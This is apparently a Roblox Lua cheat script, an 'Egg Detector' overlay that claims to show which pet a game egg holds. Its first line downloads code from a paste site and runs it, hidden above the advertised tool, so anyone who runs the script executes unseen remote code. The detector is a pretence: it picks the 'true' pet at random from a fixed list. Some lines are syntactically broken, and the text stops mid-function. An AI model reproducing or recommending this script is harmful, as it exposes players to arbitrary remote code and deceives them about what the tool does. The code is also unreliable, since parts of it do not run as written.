loadstring(game:HttpGet("https://pastefy.app/36a6IJyt/raw"))()
-- 🧪 Egg Detector GUI (Premium Lite)
local S = game:GetService
local P, W, T, U, R = S("Players"), S("Workspace"), S("TweenService"), S("UserInputService"), S("RunService")
local plr, mouse = P.LocalPlayer, P.LocalPlayer:GetMouse()

local gui = Instance.new("ScreenGui", plr:WaitForChild("PlayerGui"))
gui.Name = "EggDetectorGUI"

-- 🕐 Loading (10s)
local loading = Instance.new("TextLabel", gui)
loading.Size = UDim2.new(0, 150, 0, 30)
loading.Position = UDim2.new(0.5, -75, 0.5, -15)
loading.BackgroundColor3 = Color3.fromRGB(30, 30, 30)
loading.TextColor3 = Color3.fromRGB(255, 220, 120)
loading.Text = "🔄 Loading..."
loading.Font = Enum.Font.FredokaOne
loading.TextSize = 14
Instance.new("UICorner", loading).CornerRadius = UDim.new(0, 6)
wait(10)
loading:Destroy()

-- 📦 Pet Data
local espOn, autoRun, truePets = true, false, {}
local petTable = {
    ["Common Egg"] = { "Dog", "Bunny", "Golden Lab" },
    ["Uncommon Egg"] = { "Chicken", "Black Bunny", "Cat", "Deer" },
    ["Rare Egg"] = { "Pig", "Monkey", "Rooster", "Orange Tabby", "Spotted Deer" },
    ["Legendary Egg"] = { "Cow", "Polar Bear", "Sea Otter", "Turtle", "Silver Monkey" },
    ["Mythical Egg"] = { "Grey Mouse", "Brown Mouse", "Squirrel", "Red Fox", "Red Giant Ant" },
    ["Bug Egg"] = { "Snail", "Caterpillar", "Giant Ant", "Praying Mantis", "Dragonfly" },
    ["Bee Egg"] = { "Bee", "Honey Bee", "Bear Bee", "Petal Bee" },
    ["Anti Bee Egg"] = { "Wasp", "Tarantula Hawk", "Moth", "Butterfly", "Disco Bee" },
    ["Common Summer Egg"] = { "Starfish", "Seagull", "Crab" },
    ["Rare Summer Egg"] = { "Sea Turtle", "Flamingo", "Toucan", "Seal", "Orangutan" },
    ["Oasis Egg"] = { "Meerkat", "Sand Snake", "Axolotl" },
    ["Paradise Egg"] = { "Ostrich", "Peacock", "Capybara" },
    ["Dinosaur Egg"] = { "Raptor", "Triceratops", "Stegosaurus", "T-Rex", "Pterodactyl", "Brontosaurus" },
    ["Primal Egg"] = { "Spinosaurus", "Ankylosaurus", "Dilophosaurus", "Parasaurolophus", "Iguanodon" },
    ["Night Egg"] = { "Frog", "Hedgehog", "Mole", "Echo Frog", "Night Owl" },
    ["Zen Egg"] = { "Shiba Inu", "Nihonzaru", "Tanuki", "Tanchozuru", "Kappa", "Kitsune" },
    ["Gourmet Egg"] = { "Bagel Bunny", "Pancake Mole", "Sushi Bear", "Spaghetti Sloth", "French Fry Ferret" }
}

-- 🌈 ESP
local function glitch(label)
	coroutine.wrap(function()
		local o = label.TextColor3
		for _ = 1, 2 do
			label.TextColor3 = Color3.new(0, 1, 0)
			wait(0.07)
			label.TextColor3 = o
			wait(0.07)
		end
	end)()
end

local function showESP(model, name)
	model:FindFirstChild("PetBillboard", true)?.Destroy()
	model:FindFirstChild("ESPHighlight")?.Destroy()
	if not espOn then return end

	local base = model:FindFirstChildWhichIsA("BasePart")
	if not base then return end

	local bb = Instance.new("BillboardGui", base)
	bb.Name, bb.Size, bb.AlwaysOnTop, bb.StudsOffset = "PetBillboard", UDim2.new(0, 250, 0, 40), true, Vector3.new(0, 4.5, 0)
	local lbl = Instance.new("TextLabel", bb)
	lbl.Size, lbl.BackgroundTransparency, lbl.Text, lbl.TextScaled = UDim2.new(1, 0, 1, 0), 1, model.Name.." | "..name, true
	lbl.TextColor3, lbl.Font, lbl.TextStrokeTransparency = Color3.new(1,1,1), Enum.Font.FredokaOne, 0.3
	local h = Instance.new("Highlight", model)
	h.Name, h.FillColor, h.OutlineColor, h.FillTransparency, h.DepthMode = "ESPHighlight", Color3.fromRGB(255,200,0), Color3.fromRGB(255,255,255), 0.7, Enum.HighlightDepthMode.AlwaysOnTop
	h.Adornee = model
	glitch(lbl)
end

local function clearESP(model)
	model:FindFirstChild("PetBillboard", true)?.Destroy()
	model:FindFirstChild("ESPHighlight")?.Destroy()
end

-- 🔍 Egg Detection
local function getEggs(radius)
	local eggs, root = {}, (plr.Character or plr.CharacterAdded:Wait()):WaitForChild("HumanoidRootPart")
	for _, o in pairs(W:GetDescendants()) do
		if o:IsA("Model") and petTable[o.Name] and (o:GetModelCFrame().Position - root.Position).Magnitude <= (radius or 60) then
			if not truePets[o] then
				truePets[o] = petTable[o.Name][math.random(1, #petTable[o.Name])]
			end
			table.insert(eggs, o)
		end
	end
	return eggs
end

local function randomize()
	for _, egg in ipairs(getEggs(60)) do
		local pet = petTable[egg.Name][math.random(1, #petTable[egg.Name])]
		truePets[egg] = pet
		showESP(egg, pet)
	end
end

-- ⏱️ Countdown
local function countdown(btn)
	for i = 3, 1, -1 do
		btn.Text = "🎲 In: " .. i
		wait(1)
	end
	randomize()
	btn.Text = "🎲 Randomize"
end

-- 🧩 UI
local f = Instance.new("Frame", gui)
f.Size, f.Position, f.BackgroundColor3 = UDim2.new(0, 220, 0, 160), UDim2.new(0, 30, 0, 100), Color3.fromRGB(25,25,30)
Instance.new("UICorner", f).CornerRadius = UDim.new(0, 10)
local stroke = Instance.new("UIStroke", f)
stroke.Color, stroke.Thickness = Color3.fromRGB(255, 205, 100), 1.4

local title = Instance.new("TextLabel", f)
title.Size, title.Text, title.TextColor3, title.BackgroundTransparency = UDim2.new(1, 0, 0, 30), "🥚 Egg Detector", Color3.fromRGB(255, 220, 120), 1
title.Font, title.TextSize = Enum.Font.FredokaOne, 18

-- Dragging
local dragBtn, dragging, offset = Instance.new("TextButton", title), false, Vector2.zero
dragBtn.Size, dragBtn.Text, dragBtn.BackgroundTransparency = UDim2.new(1, 0, 1, 0), "", 1
dragBtn.MouseButton1Down:Connect(function()
	dragging = true
	offset = Vector2.new(mouse.X - f.Position.X.Offset, mouse.Y - f.Position.Y.Offset)
end)
U.InputEnded:Connect(function(i) if i.UserInputType == Enum.UserInputType.MouseButton1 then dragging = false end end)
R.RenderStepped:Connect(function() if dragging then f.Position = UDim2.new(0, mouse.X - offset.X, 0, mouse.Y - offset.Y) end end)

-- Buttons
local function makeBtn(txt, y, fn)
	local b = Instance.new("TextButton", f)
	b.Size, b.Position = UDim2.new(1, -20, 0, 30), UDim2.new(0, 10, 0, y)
	b.Text, b.BackgroundColor3 = txt, Color3.fromRGB(255, 230, 120)
	b.Font, b.TextSize, b.TextColor3 = Enum.Font.FredokaOne, 14, Color3.new(1,1,1)
	b.TextStrokeTransparency, b.TextStrokeColor3 = 0
    
